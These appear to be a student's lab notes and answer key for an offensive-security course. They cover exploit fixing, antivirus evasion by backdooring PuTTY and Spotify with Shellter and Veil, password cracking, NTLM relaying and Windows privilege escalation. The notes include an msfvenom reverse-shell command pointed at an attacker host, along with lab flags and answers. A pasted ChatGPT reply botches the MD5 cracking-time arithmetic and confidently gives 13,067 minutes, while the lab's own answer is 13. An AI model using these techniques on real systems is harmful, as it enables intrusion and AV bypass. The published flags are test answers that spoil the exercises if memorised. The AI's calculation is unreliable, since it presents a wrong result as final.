1. Scan the ports and note the web server version (HTTP).

2. Search for a suitable exploit and make sure you check what arguments the exploit requires.

3. To get more interactive shell, you may use bash reverse shell.

4. The flag is under /home/offsec/ .

Command

nmap -A -T4 192.168.117.188

3. Capstone Lab: An exploitable server is running services on several ports on the exercise VM, PublicExploits03. Treat
this like a real box and start by identifying what services are running. There is a local user student on this box with the
password lab.
Exploit the vulnerable service and SSH to the box to read
flag.txt located in /home/challenge/.

Answer

intruder

View hints

HINT

The ports may need to be modified in the exploit.

HINT

1. Scan all ports and identify services and versions.
2. Find a suitable exploit and understand its requirements.
3. Modify the port in the exploit to match the target.
4. Trigger the exploit by connecting to the SSH with the -p option on the target.

Command

For some reason my IP was different, but it worked once the received IP was put into the exploit.

13. Fixing Exploits


13.1.3. Cross-Compiling Exploit Code

Fixing Exploits - Changing The Socket Information - Windows Client

Labs
1. Locate the C-written exploit discussed in this section using the
searchsploit tool in Kali Linux. What is the Exploit DB ID related to
the exploit?

Answer

42341

View hints

HINT

1. Searchsploit can be used to search the exploits for "Sync Breeze Enterprise 10.0.28" and look for .c extension.
2. Identify the exploit by noting the name of the C exploit in listing 2, and provide this ID/number as your answer
without extensions.

Command

2. Install the mingw-w64 suite in Kali Linux and compile the exploit
code. What is the parameter used to statically link the local library?

Answer
-l

View hints
HINT

1. Take a closer look at listing 9, where mingw-w64 produces an error-free executable by using the additional
parameter.
2. In this case, we are adding the ws2_32 library with the help of the parameter being asked about here.

Command

3. Start the Windows Client VM and modify the connection information
in the exploit to target the SyncBreeze installation on your
VM. What is the C function that defines an IP address?

Answer
inet_addr

View hints

HINT

1. Consider connecting via RDP and starting the syncbreeze service on the machine.
2. Check listing 10 to find the C function that points to the usage of the IP address.

Command

4. Recompile the exploit and use Wireshark to confirm that the code
successfully initiates a socket connection to your dedicated Windows
client. Run the exploit by issuing the
wine command before the file.
Which C function in the code is used to convert the port number into
network byte order?

Answer

80

View hints

HINT

1. Start the Sync Breeze Enterprise service.


2. Remember to update the IP and Port and recompile the exploit.
3. Which function did you use to update the port? This is also shown in listing 10.

Command

13.1.4. Fixing the Exploit

Labs
1. Replace the return address from the C version of the exploit with
the one present in the Python version and recompile it. In order to
execute the subsequent shellcode that is present on the stack, which
instruction do we normally want to make the return address point to?

Answer

JMP ESP

View hints

HINT

1. Identify the assembly instruction that redirects execution to the stack.
2. The answer is an assembly instruction.

Command

2. Start the target Windows 10 VM and take note of the IP address.
Generate a reverse shell payload using
msfvenom while taking into
account the target IP and the bad characters of our exploit.
Replace the original payload with the newly-generated one, then attach
the debugger to the target process and set a breakpoint at the return
address instruction. Compile the exploit and run it. Verify that you
hit the breakpoint. Which application are we using to run Windows
native binaries on Kali?

Answer
wine

View hints

HINT

1. Generate the payload as shown in listing 13, specifying your LHOST.
2. You may use the Python version of the exploit (42928.py) if you encounter any issues due to ARM64.
3. Review the provided steps in listing 16 to run a Windows binary on Kali.

Command

13.1.5. Changing the Overflow Buffer

Labs
1. Fix the overflow buffer so that the EIP register will be
overwritten by your chosen return address instruction and then start
the Windows Client and get a reverse shell on your local Kali machine.

Which C function is responsible for setting the terminating null-byte
in the exploit?

Answer
memset

View hints
HINT

1. Replicate the steps demonstrated in the learning unit notes and videos.
2. Examine listing 19 more closely.

Command

13.2.2. Selecting the Vulnerability and Fixing the Code

Labs
1. Start the Debian VM, connect to it via SSH, then start the apache2 service. The target
web application is located under
/var/www/https/. Which protocol is
the vulnerable web application running on?

Answer

https

View hints

HINT

Focus on the base URL in listing 26, specifically the protocol.

Command

2. Modify the original exploit and set the base_url variable to the
correct IP address of your Debian VM as well as the protocol to HTTPS.
Which Python method has been used to remove the admin portion from
the base_url string?

Answer

split

View hints

HINT

1. Which Python method breaks a string into a list of substrings based on a specified delimiter?
2. Look at listing 31 and the line starting with upload_url.

Command

3. Get familiar with the requests Python library and adjust your
exploit accordingly to avoid SSL verification. Which parameter is
responsible for skipping TLS/SSL verification in the POST requests?

Answer

verify

View hints

HINT

Check listing 28 to see where it gets "verified." The answer is the "variable" itself.

Command

4. Edit the username and password variables to match the ones from
our test case (username "admin", password "HUYfaw763").
Which variable holds the PHP page responsible for
authentication?

Answer

page

View hints

HINT

1. Which variable is responsible for login?
2. Examine the function "authenticate" in the exploit or in listing 31.

Command

5. Try to run the exploit against the Debian VM. Based on the error
message, which array position is the split method trying to access
when returning from the parse_csrf_token function?

Answer
1

View hints
HINT

1. Identify the line and method where the error originates.
2. Look for the array index causing the "IndexError."

Command

13.2.3. Troubleshooting the "index out of range" Error

Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

Fixing Exploits - Fixing Web Exploits - Debian VM 1

Fixing Exploits - Fixing Web Exploits - Module Exercise VM #1

Fixing Exploits - Fixing Web Exploits - Module Exercise VM #2

Fixing Exploits - Fixing Web Exploits - Module Exercise VM #3

Labs
1. Observe the error that is generated when running the exploit and troubleshoot the code to determine why the error
occurs. Modify the exploit in order to avoid the error and run it against your dedicated Debian client. Then verify that
your exploit worked by attempting to execute the
whoami command using the remote PHP shell. Finally, attempt to obtain a fully interactive shell with this exploit. Into
which variable is the webshell payload stored?

Answer

payload

View hints

HINT

1. Start the apache2 service on Debian VM 1.
2. Use the previous learning unit, listing 31 script, and update the IP.
3. Encode the command used to get the reverse shell.
4. Check the final script for the variable name that helped get the web shell.

Command

2. Capstone Lab: To put into practice what we learned so far, here is the full vulnerable CMS Made Simple. You recovered
the credentials for the admin on this service who is the user offsec with the password
lFEZK1vMpzeyZ71e8kRRqXrFAs9X16iJ. Use this information to exploit the service on VM 1 that is running on
http://[IP_ADDRESS]/cmsms and read /home/flag.txt to solve this challenge.

Answer

OS{8090c08faf3272623a5ed87e355d7427}

View hints



HINT

1. Use the same script that worked previously and make the necessary modifications.
2. Is it http or https?
3. Remember to encode your command and use a proper listening port that isn't firewalled in most cases.

Command



We go through and add verify=false to the arguments of every response.

We add print "[+] String that is being split: " + location to the parse_csrf_token function.

It returns …admin?_sk_=… to us.



So we change the csrf_param variable ("__c") to _sk_

and it uploads shell.php for us.
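An added example, not the exploit's own code and not part of these notes, of the "index out of range" failure the hints above describe and of a parser that does not fail that way: the redirect URL is parsed with urllib.parse and the candidate parameter names (the exploit's __c and the _sk_ observed above) are tried in turn. The host, paths and token values are constructed placeholders.

```python
from urllib.parse import parse_qs, urlparse

# Constructed redirect targets in the shape the notes describe: after the login POST the
# admin page redirects, and the CSRF parameter rides in the query string of that URL.
# Host, paths and token values are placeholders, not values taken from the lab.
LOCATION_WITH_SK = "http://192.0.2.10/cmsms/admin?_sk_=0123456789abcdef"
LOCATION_WITH_C = "http://192.0.2.10/cmsms/admin?__c=fedcba9876543210"
LOCATION_NO_TOKEN = "http://192.0.2.10/cmsms/admin/login.php"

# Parameter names to try, in order: the "_sk_" seen in the notes above and the
# exploit's original "__c". Extend the tuple if a target uses yet another name.
CSRF_PARAM_CANDIDATES = ("_sk_", "__c")


def parse_csrf_token_naive(location, csrf_param="__c"):
    """The fragile pattern: split on 'param=' and index [1].

    When the parameter is absent, split() returns a single element and [1] raises
    IndexError, which is the "index out of range" symptom the hints refer to.
    (Hypothetical reconstruction of the pattern, not the exploit's exact line.)
    """
    return location.split(csrf_param + "=")[1].split("&")[0]


def naive_raises_index_error(location, csrf_param="__c"):
    """True if the naive parser fails on this URL; used to demonstrate the failure mode."""
    try:
        parse_csrf_token_naive(location, csrf_param)
    except IndexError:
        return True
    return False


def parse_csrf_token(location, csrf_params=CSRF_PARAM_CANDIDATES):
    """Return (param_name, token) for the first candidate present in the query string.

    The URL is parsed properly instead of being sliced, so a missing or renamed
    parameter yields (None, None) rather than an exception, and the caller learns
    which name was actually found on this target.
    """
    query = parse_qs(urlparse(location).query)
    for name in csrf_params:
        values = query.get(name)
        if values:
            return name, values[0]
    return None, None


if __name__ == "__main__":
    for loc in (LOCATION_WITH_SK, LOCATION_WITH_C, LOCATION_NO_TOKEN):
        print(f"[+] String that is being split: {loc}")
        print("    naive parser raises IndexError:", naive_raises_index_error(loc))
        print("    robust parser:", parse_csrf_token(loc))
```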

3. Capstone Lab: The next VM, Module Exercise VM 2, is running a vulnerable version of the elFinder web application
for which an exploit is available. Once you've found the application base address through directory brute-forcing, modify the
exploit to point to the correct application URL and get a shell. The flag can be found in the same folder. Note: Before
running the exploit, remember to place a valid JPEG file on your local Kali machine and name it according to the exploit
specifications.

Answer

OS{463e29252cbc18c72ba516dd97427a06}

View hints

HINT

1. Use the directory-list-2.3-small.txt wordlist and give it some time.
2. Some fake sample files will be needed for the exploit.
3. Execute the exploit using python2 and provide the found application base address.

Command



because inside the exploit it is SecSignal.jpg



4. Capstone Lab: Enumerate the Module Exercise VM 3 and find
the application that has a memory corruption vulnerability. Then find
the related public exploit and fix it as illustrated in this Module.

Answer

OS{227b2531f8a41e320350e761376a0781}

View hints

HINT

1. Set the correct stageless/staged payload to catch the reverse shell.
2. Don't remove the NOP sled in the shellcode from the original exploit.
3. There could be various versions of the exploit, but at least one of them should be effective.

Command

Because this lab took two days of my time, there are no screenshots.



nmap -sCV -p- ip

On port 20000 we find the Easy Chat Server service and look for an exploit for it.

After searching we find the 50999.py exploit, make changes to it, and exploit the target.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.195 LPORT=443 -f python -b "\x00\x20" -v sh

We change the NOP count from 16 to 32.

We drop in our shellcode and fix the IPs and ports in the headers below it.

Once our exploit is ready:



msfconsole

We enter the exploit and payload shown in the picture, along with the IP and port, and run it,

and a reverse shell opens for us.

The flag is located in c:\Users\Administrator\Desktop.



14. Antivirus Evasion
14.1.3. Detection Methods

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

Antivirus Evasion - AV Components and Operations - VM #1

Labs
1. Which AV engine is responsible for translating machine code into assembly?

Answer

disassembler

View hints

HINT

This component is mentioned in the subchapter "AV Engines and Components"
and it helps to identify any encoding/decoding routine.

Command

2. Which AV detection method makes use of an engine that runs the executable file from inside an emulated sandbox?



Answer

Behavior-Based

View hints

HINT

This detection method analyzes binary file "actions" in an emulated environment such as a small virtual machine.

Command

3. Start up VM #1 and connect via RDP to the Windows 11 machine with the provided credentials. On the user's desktop
you will find a PE file named malware.exe. In order to get the flag, upload the malware sample to
http://www.virustotal.com and once the analysis has completed check the metadata present in the BEHAVIOR tab.

Answer

OS{85189b03c19ff1e2622933a26b151ceb}

View hints

HINT

1. Download malware.exe using the drive capabilities provided by either xfreerdp or rdesktop.
2. Once the file is uploaded, you should find more occurrences of the flag by looking at Behavior > Process and
service actions

Command



14.2.2. In-Memory Evasion

Labs
1. Which on-disk evasion technique makes use of code made by spurious
instructions and that is not part of the main execution?

Answer

Obfuscators

View hints

HINT

1. This technique is mentioned in this module.
2. This technique restructures and alters code to increase its resistance to reverse engineering.

Command



2. When performing Remote Process Injection, which API is responsible
for copying the shellcode into the target thread?

Answer

WriteProcessMemory

View hints

HINT

1. This API function allows a process to "Write" data to the virtual address space of another process.
2. Review the steps after memory allocation in Remote Process Injection.

Command

3. Between packers and crypters, which one provides the highest level of stealth?

Answer
crypters

View hints
HINT

This encryption can make it significantly more difficult for antivirus and security software to detect the malicious
code, as it appears as encrypted data rather than executable code.

Command

14.3.2. Evading AV with Thread Injection

Labs
1. Review the code from the PowerShell script and ensure that you have a basic understanding of how it works. Connect
to the VM 1 and get a shell back to your Kali Linux machine using the memory injection PowerShell AV bypass technique
we covered in this Learning Unit. As an additional exercise, attempt to get a reverse shell using a PowerShell one-liner
rather than a script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py). Which API have
we used in our script to allocate memory for the shellcode?

Answer
VirtualAlloc

View hints

HINT



1. Repeat the steps demonstrated in the video and text.
2. Remember to open "Windows PowerShell (x86)" according to the architecture set for the msfvenom payload.
3. For the answer, refer to the paragraph about allocating blocks of memory.

Command

14.3.3. Automating the Process

Antivirus Evasion - Evading AV - Automating the Process - VM #1

Antivirus Evasion - Module Exercise - VM #1

Antivirus Evasion - Module Exercise - VM #2

Labs
1. Use Shellter to inject a Meterpreter reverse shell payload into the Spotify executable, then transfer the binary to your
Windows 11 client VM #1 and ensure that it is not being detected by the antivirus. Afterwards, set up a Meterpreter listener, run
the backdoored Spotify installer, and
verify that you have obtained an interactive shell. As an additional exercise, attempt to find different executables and
inject malicious code into them using Shellter.

Which Shellter option is responsible for restoring the execution flow of the backdoored binary and therefore avoids any
unwanted suspicion?

Answer

Stealth Mode

View hints

HINT

1. Refer to the notes and video showing how to create and transfer the backdoored Spotify installer.
2. For the answer, refer to the paragraph about restoring the execution flow.

Command

2. Capstone Lab: In this exercise, you'll be facing off against the COMODO antivirus engine running on Module Exercise VM
#1. Use another popular 32-bit application, like PuTTY, to replicate the steps learned so far in order to inject malicious
code into the binary with Shellter. The victim machine runs an anonymous FTP server with open read/write permissions.
Every few seconds, the victim user will double-click on any existing .exe file(s) in the FTP root
directory. If the antivirus flags the script as malicious, the script will be quarantined and then deleted. Otherwise, the
script will execute and hopefully grant you a reverse shell. NOTE: set the FTP session as
active and enable binary encoding while transferring the file.

Answer

OS{d197314a926a15380f754bfabe4eebc7}

View hints

HINT

1. Download the binary from https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
2. Remember to set the FTP session as active: ftp -A 192.168.xxx.53 and enable binary mode: ftp> bin

Command

We launch Shellter, choose Auto mode, and enter the path of the putty program from earlier.

We enable Stealth Mode, choose a shell from the list, and enter our own IP and port.



In Metasploit we listen on our local IP and port.

The -A option means the FTP session is active; we log in with the user anonymous and leave the password empty; the bin command
switches to binary mode, and with the put command we upload the putty.exe file,

and a reverse shell opens for us; the flag is in \users\administrator\desktop\flag.txt.



3. Capstone Lab: Similar to the previous exercise, you'll be facing off against the COMODO antivirus engine v12.2.2.8012 on
Module Exercise VM #2. Although the PowerShell AV bypass
we covered in this Module is substantial, it has an inherent limitation. The malicious script cannot be
double-clicked by the user for immediate execution. Instead, it would open in
notepad.exe or another default text editor. The tradecraft of manually weaponizing PowerShell scripts is beyond the
scope of this module, but we can rely on another open-source framework to help us automate this process. Research
how to install and use the Veil framework to help
you with this exercise.

The victim machine runs an anonymous FTP server with open read/write
permissions. Every few seconds, the victim user will double-click on
any existing Windows batch script file(s) (.bat) in the FTP root
directory. If the antivirus flags the script as malicious, the script
will be quarantined and then deleted. Otherwise, the script will
execute and hopefully, grant you a reverse shell.

Answer

OS{6d35088590c257c41bff71cf0a0c2477}

View hints

HINT

1. The installation steps are already provided in the Veil-Framework link.
2. Remember to set the FTP session as active: ftp -A 192.168.xxx.53 and enable binary mode: ftp> bin

Command

We install the Veil framework.



We launch Veil with sudo rights.

After Evasion starts, we view the payloads with the list command and choose powershell/meterpreter/rev_tcp.py.

After choosing the payload we enter the options, i.e. LHOST and LPORT, and give a name for the .bat file to be generated.

Once it is generated we copy it to our current directory,

and we listen with Metasploit.

We upload our malware: user anonymous, skip the password, and upload our .bat file with the put command,



and a reverse shell appears; we find the flag in C:\Users\Administrator\Desktop.

15. Password Attacks


7.1.1. SSH and RDP

Password Attacks - SSH and RDP - VM #1 192.168.136.201

Password Attacks - SSH and RDP - VM #2

Password Attacks - SSH and RDP - VM #3

Labs
1. Follow the steps outlined in this section to leverage a dictionary
attack to get access to SSH (port 2222) on VM #1 (BRUTE). Find the flag
in the george user's home directory.

Answer

OS{b3ad949fa77f91e9f98a7c4912ac9580}

View hints
1. Use the commands provided in listing 2 and make sure to adjust the IP address with VM #1's IP.
2. When connecting to SSH, remember to set the port as 2222 using the -p 2222 option.

Command



2. Follow the steps outlined in this section to leverage a dictionary
attack to gain access to RDP on VM #2 (BRUTE2). Find the flag on either
one of the user's desktops. To reduce the time it takes to perform the
password spraying, you can create a list with the two usernames:
justin and daniel.

Answer

OS{f0c30e8018150d11f0ff00193313a7e3}

View hints

1. Create a custom wordlist with only the names justin and daniel and
use the command provided in listing 3. Make sure to adjust the IP
address with VM #2's IP.
2. RDP to the target with either justin or daniel and the password you have obtained.

Command



We save justin and daniel to a user.txt file, use hydra's -L option to supply the users as a file, and start
the brute force.

3. Enumerate VM #3 (BRUTE2) and find another network service. Use the knowledge from this section to get access as
the itadmin user and find the flag.

Answer

OS{6d117cb0f9332775553031e47ae29248}

View hints

1. Perform an Nmap scan to identify the different network service.
2. Use the rockyou.txt wordlist. Ensure the target is set according to the different protocol.
3. Cracking will only take a few seconds.
4. The flag can be downloaded with the "get" command.

Command

7.1.2. HTTP POST Login Form

Password Attacks - HTTP POST Login Form - VM #1

Password Attacks - HTTP POST Login Form - VM #2

Labs
1. Follow the steps from this section to gain access to TinyFileManager on VM #1 (BRUTE). Once logged in, find the flag.

Answer
OS{55e6939cc123996995f9ff8fd3a4dc6f}

View hints

1. Refer to the listing 4 and perform a dictionary attack on your assigned VM #1.
2. Log in using the obtained password.
3. The flag can be found inside install.txt.

Command

2. The web page on VM #2 is password protected. Use Hydra to perform a password attack and get access as user
admin. Once you have identified the correct password, enter it as the answer to this exercise.

Answer

789456

View hints

1. The authentication mechanism here is HTTP basic authentication.
2. Hydra supports various protocols such as http-get and http-post which
can be used, depending on the application, to perform a dictionary attack
to obtain the password.

Command

7.2.1. Introduction to Encryption, Hashes and Cracking

Labs
1. Answer with true or false: In symmetric encryption, one key is used for both the encryption and decryption process.

Answer

true

View hints

no hints

Command

no commands

2. Answer with true or false: In asymmetric encryption, we can share
the private key freely over the network to another person without
risking that a third party can capture our key and then decrypt messages
which get sent to us.

Answer

false

View hints

no hints

Command

no commands

3. Answer with true or false: A cryptographic hash function is a
one-way function. The resulting hash cannot be reversed by reversing the
steps used to hash the plain text information.

Answer
true

View hints

no hints

Command

no commands

4. Use the MD5 GPU hash rate from the GPU benchmark of this section and
calculate the cracking time in minutes with the following conditions.
Use a charset of all lower and upper case letters of the English
alphabet and use a password length of 8. Enter the answer as full
minutes without seconds.

Answer

13

View hints

1. Count the total number of lowercase and uppercase letters.
2. Since the password length is 8 characters, multiply the count from step 1 by 8.
3. Divide the result by the number of MD5 GPUs, and then by 60 to find how many minutes it will take.

Command

if gpu hashrate is 68,185.1 MH/s

calculate with this

ChatGPT said:

Let's calculate the cracking time with a GPU hash rate of 68,185.1 MH/s. This is equivalent to:

$H = 68{,}185{,}100{,}000 \,\text{hashes/second}$ (68.1851 billion hashes per second).

Step-by-Step Calculation

1. Charset Size:
The charset contains 52 characters (26 lowercase + 26 uppercase).

2. Total Password Combinations:
For a password length of 8:

$52^8 = 53{,}459{,}728{,}531{,}456$

3. Time in Seconds:

$\text{Time (seconds)} = \frac{\text{Total combinations}}{\text{Hash rate}}$

Substituting the values:

$\text{Time (seconds)} = \frac{53{,}459{,}728{,}531{,}456}{68{,}185{,}100{,}000} = 784{,}006.94 \,\text{seconds}$

4. Convert to Minutes:

$\text{Time (minutes)} = \frac{\text{Time (seconds)}}{60} = \frac{784{,}006.94}{60} = 13{,}066.78 \,\text{minutes}$

5. Round to Full Minutes:

$\text{Cracking Time} = 13{,}067 \,\text{minutes}$

Final Answer:
The cracking time is approximately 13,067 minutes.
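An added example, not part of these notes or the course, that carries the keyspace and cracking-time arithmetic from the question above through in Python for the 52-letter charset, length 8 and the 68,185.1 MH/s figure quoted, and then repeats it for other lengths. The keyspace of a fixed-length password is charset_size ** length, and MH/s means 10^6 hashes per second.

```python
# Lab inputs: a-z plus A-Z (52 symbols), length 8, and the MD5 GPU benchmark
# figure quoted in the notes, given in MH/s (mega-hashes per second).
CHARSET_SIZE = 26 + 26
PASSWORD_LENGTH = 8
MD5_RATE_MH_S = 68_185.1

# "MH/s" is 10^6 hashes per second. Plugging in 10^3 by mistake inflates every
# result below by a factor of 1000.
HASHES_PER_MH = 1_000_000


def keyspace(charset_size, length):
    """Number of candidates for a fixed-length password over the charset: charset_size ** length."""
    if charset_size < 1 or length < 1:
        raise ValueError("charset_size and length must be positive")
    return charset_size ** length


def crack_time_seconds(charset_size, length, rate_mh_s):
    """Worst-case seconds to exhaust the whole keyspace at the given hash rate."""
    return keyspace(charset_size, length) / (rate_mh_s * HASHES_PER_MH)


def crack_time_full_minutes(charset_size, length, rate_mh_s):
    """Exhaustive cracking time in whole minutes with the seconds dropped, as the question asks."""
    return int(crack_time_seconds(charset_size, length, rate_mh_s) // 60)


def time_by_length(charset_size, rate_mh_s, lengths):
    """Exhaustive time in seconds for each requested length, to show how fast the keyspace grows."""
    return {n: crack_time_seconds(charset_size, n, rate_mh_s) for n in lengths}


if __name__ == "__main__":
    secs = crack_time_seconds(CHARSET_SIZE, PASSWORD_LENGTH, MD5_RATE_MH_S)
    mins = crack_time_full_minutes(CHARSET_SIZE, PASSWORD_LENGTH, MD5_RATE_MH_S)
    print(f"keyspace 52^8 = {keyspace(CHARSET_SIZE, PASSWORD_LENGTH):,}")
    print(f"exhaustive time = {secs:,.2f} s = {mins} full minutes")
    for n, t in time_by_length(CHARSET_SIZE, MD5_RATE_MH_S, range(6, 13)).items():
        print(f"length {n:2d}: {t / 86400:14.4f} days")
```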

7.2.2. Mutating Wordlists

Labs
1. You extracted the MD5 hash "056df33e47082c77148dba529212d50a" from a
target system. Create a rule to add "1@3$5" to each password of the
rockyou.txt wordlist and crack the hash.

Answer

courtney1@3$5

View hints

1. Define each character individually using the '$' symbol:
cat demo.rule:
$1 $@ $3 $$ $5

2. Use Hashcat for cracking MD5-hashed passwords.

Command



2. You extracted the MD5 hash "19adc0e8921336d08502c039dc297ff8" from a
target system. Create a rule which makes all letters upper case and
duplicates the passwords contained in
rockyou.txt and crack the hash.

Answer

BUTTERFLY5BUTTERFLY5

View hints

1. cat demo5.rule: u d
2. Use Hashcat for cracking MD5-hashed passwords.

Command

7.2.3. Cracking Methodology

Labs
1. Identify the hash function of the following hash
"4a41e0fdfb57173f8156f58e49628968a8ba782d0cd251c6f3e2426cb36ced3b647bf83057dabeaffe1475d16e7f62b7"

Answer

SHA-384

View hints

hash-identifier tool

Command

2. Identify the hash function of the following hash
"$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC"

Answer

bcrypt

View hints

hashid tool

Command

7.2.4. Password Manager

Password Attacks - Password Manager - VM #1 192.168.169.203

Password Attacks - Password Manager - VM #2

Labs
1. Follow the steps outlined in this section to obtain the master
password of the KeePass database on VM #1 (SALESWK01). Enter the
password found with the title "User Company Password".

Answer

XOWV2yg3JVkYc5cOBYip

View hints

no hints

Command

2. Enumerate VM #2 and get access to the system as user nadine.
Obtain the password stored as title "flag" in the password manager and
enter it as answer to this exercise. Note that the flag is not formatted
as
OS{} for this exercise.

Answer

eSGJIzUp5nrr834QZBWK

View hints

1) Run an Nmap scan to find open ports.
2) Determine which protocol to brute force for GUI access.
3) Use the provided username and perform a dictionary attack for the password.
4) Once you log in with the new password, check out the Documents folder of the nadine user and crack the
password manager as shown in the course.
5) Note that this flag isn't formatted as OS{}. Use the exact value.

Command

I brute-forced it, but hydra could not find the password.

The "Database:" prefix has to be removed with nano.

7.2.5. SSH Private Key Passphrase

Password Attacks - SSH Private Key Passphrase - VM #1 192.168.210.201

Password Attacks - SSH Private Key Passphrase - VM #2

Labs
1. Follow the steps outlined in this section to get access to VM #1
(BRUTE) on port 2222 with SSH by cracking the passphrase of the private
key. Find the flag in the home directory of the user
dave.

Answer

OS{2f68316dca8e8eb2742c609b36303e35}

View hints

no hints

Command

Download id_rsa.

2. Enumerate VM #2 and find a way to get access to SSH on port 2222.
Find the flag of the user you used for the SSH connection. You can use
the same rules we created in this section.

Answer

OS{345bd58830e1f8de9d9a6cd474a799ad}

View hints

1. Run an Nmap scan to find open ports.

2. Enumerate web server version to find a vulnerability.

3. Using the vulnerability, enumerate the users on the system and obtain the .ssh key.

4. Use the commands provided in Listing 28 and 35 to crack the passphrase for the SSH key.

5. Obtain the flag by logging in via SSH by using the -p option.

Command

We delete the "alfred_rsa:" prefix.

7.3.1. Cracking NTLM

Password Attacks - Cracking NTLM - VM #1

Password Attacks - Cracking NTLM - VM #2

Labs
1. Follow the steps outlined in this section and find the flag on the
nelly user's desktop on VM #1 (MARKETINGWK01).

Answer

OS{ceb06484bad38656ae3e01639fe68830}

View hints

no hints

Command

2. Access VM #2 via RDP as user nadine with the password
retrieved in the exercise of the section labeled "Password Manager" and
leverage the methods from this section to extract Steve's NTLM hash. Use

best64.rule for the cracking process and enter the plain text password as answer to this exercise.

Answer

francesca77

View hints

1. Obtain the password of nadine by completing the Password Manager learning unit Q2 exercise.
2. Use the commands provided in Listings 39 and 42 to obtain Steve's password.

Command

15.3.2. Passing NTLM

Password Attacks - Passing NTLM - VM Group 1 + 192.168.210.211 192.168.210.212

Labs
1. Use the methods from this section to get access to VM #2 and find the flag on the desktop of the user
Administrator.

Answer

OS{96805bee3414d881bb636797b67254ce}

View hints

1. Connect to VM #1 via RDP with the provided credentials.
2. Use the commands provided in listing 43; mimikatz is located in C:\tools\.
3. After you have obtained the NTLM hash, use the commands provided in listing 44 to connect to your .212 machine.

Command

192.168.210.211 creds: gunther / password123!

After we obtain the Administrator NTLM hash, privilege escalation can be done in two ways:

1)

2)

15.3.3. Cracking Net-NTLMv2

Password Attacks - Cracking Net-NTLMv2 - VM #1 192.168.210.211

Password Attacks - Cracking Net-NTLMv2 - VM #2

Labs
1. Follow the steps outlined in this section to obtain the Net-NTLMv2 hash in Responder. Crack it and use it to connect
to VM #1 (FILES01) with RDP. Find the flag on
paul's desktop. Attention: If the bind shell is terminated it may take up to 1 minute until it is accessible again.

Answer

OS{bda9c997e2e8132cb169a1be5f00459a}

View hints

no hints

Command

2. Enumerate VM #2 and find a way to obtain a Net-NTLMv2 hash via the web application. Important: Add
marketingwk01 to your /etc/hosts file with the corresponding IP address of the machine. After you have obtained the
Net-NTLMv2 hash, crack it, and connect to the system to
find the flag.

Answer

OS{f5d6b9f3330599a1a9b856459ceeb422}

View hints

no hints

Command

15.3.4. Relaying Net-NTLMv2

Password Attacks - Relaying Net-NTLMv2 - VM Group 1 + 192.168.210.211

Password Attacks - Relaying Net-NTLMv2 - VM Group 2

Labs
1. Use the methods from this section to get access to VM #2 (FILES02) of VM Group 1 and obtain the flag on the
files02admin user's desktop. If the bind shell on VM #1 is terminated, it may take up to 1 minute until it is accessible
again.

Answer

OS{8432c315f06dd4a249dd5b3a490b50f9}

View hints
1. For base64 encoding, use the commands provided in listing 57 of Using Executable Files in Common Web
Application Attacks module.
2. Use the commands provided in listing 52 to relay your powershell commands.

Command

2. Capstone Lab: Start VM Group 2 and find a way to obtain a Net-NTLMv2 hash from the anastasia user via the web
application on VM #3 (BRUTE2) and relay it to VM #4 (FILES02).

Answer

OS{15ef1336883fae5ca4832307853d73c0}

View hints

1. Start the ntlmrelayx server as shown in listing 52.
2. Access the Beta App and execute the dir command shown in listing 49.
3. Remember to use your assigned Kali IP address.

Command

I used the encoded PowerShell script from the previous lab here as well.

15.3.5. Windows Credential Guard

Password Attacks - Windows Credential Guard - VM Group 1

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. What domain does the
Administrator user extracted from Mimikatz belong to?

Answer

CORP

View hints

no hints

Command

2. What is the name of the hypervisor developed by Microsoft?

Answer

Hyper-V

View hints

no hints

Command

3. In which Virtual Trust Level (VTL) can LSAISO.exe be found?

Answer

VTL1

View hints

no hints

Command

4. In what format must Security Support Providers be to register in lsass.exe?

Answer

DLL

View hints

no hints

Command

16. Windows Privilege Escalation

16.1.1. Understanding Windows Privileges and Access Control Mechanisms

Labs
1. What is the RID of the first standard user?

Answer

1000

View hints

no hints

Command

2. Answer with true or false: An access token is generated when a user is created and is immutable.

Answer

false

View hints

no hints

Command

16.1.2. Situational Awareness

Windows Privilege Escalation - Situational Awareness - VM #1

Windows Privilege Escalation - Situational Awareness - VM #2

Labs
1. Check the users of the local group
Remote Management Users on CLIENTWK220 (VM #1). Enter a user which is in this group apart from steve.

Answer

daveadmin

View hints

HINT

1. Connect to your assigned VM #1 using the netcat bind shell on port 4444, as demonstrated in listing 6.
2. To view the list of users in the Remote Management Users group, refer to the command in listing 10.

Command

2. Enumerate the installed applications on CLIENTWK220 (VM #1) and find the flag.

Answer

OS{6b4f9c1c1a3d592632020ca332f48e10}

View hints

HINT

1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. Refer to the listing 15 to find out the installed applications.
3. To display all properties, remove 'select displayname' from the command.

Command

3. We'll now use an additional machine, CLIENTWK221 (VM #2), to practice what we learned in this section. Access the
machine via RDP as user mac with the password IAmTheGOATSysAdmin!. Identify another member of the local
Administrators group apart from offsec and Administrator.

Answer

roy

View hints

HINT

Refer to listing 10 for local Administrators group users.

Command

4. Enumerate the currently running processes on CLIENTWK221 (VM #2). Find a non-standard process and locate the
flag in the directory of the corresponding binary file.

Answer

OS{eb1adcec62664ca2ba481fa9effb72f2}

View hints

HINT

1. Refer to listing 16 to retrieve a list of all running processes.
2. Look for non-standard processes by checking unusual names or locations in the output.
3. Identify the process binary file path, then check the binary file path to obtain the flag.

Command

16.1.3. Hidden in Plain View

Windows Privilege Escalation - Hidden in Plain View - VM #1

Windows Privilege Escalation - Hidden in Plain View - VM #2

Labs
1. Connect to the bind shell (port 4444) on
CLIENTWK220 (VM #1) and follow the steps from this section. Find the flag on the desktop of backupadmin.

Answer

OS{ba26cfc4ba7d39e2276f9ec983c9436b}

View hints

HINT

1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. Follow the steps shown in this section on your assigned VM #1.

Command

2. Log into the system CLIENTWK220 (VM #1) via RDP as user steve. Search the file system to find login credentials for
a web page for the user steve and enter the password as answer to this exercise.

Answer

thisIsWhatYouAreLookingFor

View hints

HINT

1. Log in to VM #1 using the password found in the previous exercise (listing 21).
